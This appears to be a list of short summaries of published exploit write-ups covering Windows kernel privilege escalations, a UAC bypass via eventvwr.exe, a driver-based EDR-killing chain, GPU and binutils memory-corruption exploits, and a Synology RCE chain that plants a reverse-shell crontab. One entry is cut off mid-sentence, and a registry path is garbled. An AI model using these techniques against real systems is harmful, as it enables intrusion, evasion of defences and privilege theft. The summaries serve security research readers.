CVE-2018-8611 is a race-condition LPE in the Windows Kernel Transaction Manager (KTM), originally caught in the wild by Kaspersky’s AEP in October 2018 and patched in December 2018. This first instalment lays the KTM foundation — transaction managers, resource managers, transactions, enlistments — that the rest of the series builds on.
cocomelonc’s tabby is a tiny teaching framework for writing position-independent Windows x64 shellcode in C, with indirect NT syscalls and no IAT, no CRT, no PE header — the whole toolchain runs on Linux via mingw-w64, nasm, a custom linker script, and objcopy. The whole thing is ~500 lines of C plus ~80 of NASM and produces a flat shellcode.bin ready to inject.
CVE-2024-1065 is a physical-page use-after-free in the ARM Mali GPU kernel driver. Because the freed page lands in MIGRATE_MOVABLE, Dirty Pagetable and Dirty Cred do not apply — so this writeup uses a page-cache spray to swap the freed page into the in-memory copy of /usr/bin/passwd and gets root via execve() without touching disk.
When a Windows stack overflow gives you ~250 bytes of crash-buffer space but a useful Meterpreter payload is 400+ bytes, the answer is an egghunter. This walkthrough takes Savant Web Server 3.1 from initial crash to NT-level shell: partial overwrite to defeat the savant.exe null-byte module base, POP EAX RET gadget, a 7-byte conditional jump that exploits pre-zeroed memory, two independent buffers (URL path + HTTP body), then both classic egghunters — syscall-based on Windows 10 (with the NEG trick to encode 0x1C8 null-free) and the OS-agnostic SEH-based variant with a custom dispatcher handler.
CVE-2021-1732 is a Win32k local privilege escalation in win32kfull.sys. By flipping the 0x800 bit on tagWND with NtUserConsoleControl and returning a fake value from a user-mode callback inside xxxClientAllocWindowClassExtraBytes, an attacker turns the cbWndExtra length into a controllable kernel write offset and walks the token to NT AUTHORITY SYSTEM. End-to-end Metasploit PoC against Windows 10 20H2.
zer0matt’s Milan0day 2026 talk walks through a clean BYOVD chain: ThrottleStop.sys (CVE-2025-7771) gives arbitrary physical-memory R/W via MmMapIoSpace, used to inline-patch NtAddAtom into a temporary trampoline. Phase 1 redirects to PsLookupProcessByProcessId to lift the target’s EPROCESS pointer; phase 2 redirects to PsTerminateProcess to kill the AV/EDR from kernel mode. Original bytes are restored after each shot to dodge PatchGuard. PoC: github.com/zer0matt/Milan0day2026
A missing bounds check in binutils’ FR30 relocation handler lets a single crafted object file turn objdump -g into a one-shot exploit chain — defeating ASLR, PIE and modern heap hardening with no information leak. The Calif team’s writeup walks through wrapping a 64-bit arelent offset, swapping endianness via a 2-byte partial overwrite of an xvec pointer, borrowing i386’s partial_inplace relocation as an OOB increment, and finally pivoting to code execution through a House of Apple 2 FILE-struct hijack.
A walkthrough of the well-documented Windows UAC bypass that uses “eventvwr.exe”’s auto-elevate manifest plus a writable HKCU registry handler for the “mscfile” shell verb. Writing a single REG_SZ value under “HKCUSoftwareClassesmscfileshellopencommand and launching “eventvwr.exe” via “ShellExecuteEx” with the “runas” verb causes Windows to silently spawn the attacker’s payload at High integrity — no consent prompt. S12 reproduces the technique in a small C++ tool, demonstrates near-universal AV evasion on Kleenscan, and discusses the detection footprint.
Rapid7’s Jonah Burgess has disclosed a critical (CVSS 9.4) authenticated argument-injection RCE in the self-hosted Gogs Git server. Any authenticated user can create a branch named “–exec=
A deep technical write-up of the Synology BeeStation pre-auth-to-RCE chain disclosed by DEVCORE at Pwn2Own Ireland 2024 (CVE-2024-50629 CRLF injection, CVE-2024-50630 auth bypass via webapi-to-syncd domain-socket trust, CVE-2024-50631 SQL injection in update_settings) plus an N-day variant by Kiddo that swaps DEVCORE’s PHP-based RCE for a novel “ATTACH DATABASE” primitive against “/etc/cron.d/pwn.task”, exploiting cron’s line-skip tolerance to embed a working reverse-shell crontab inside an otherwise-binary SQLite file.
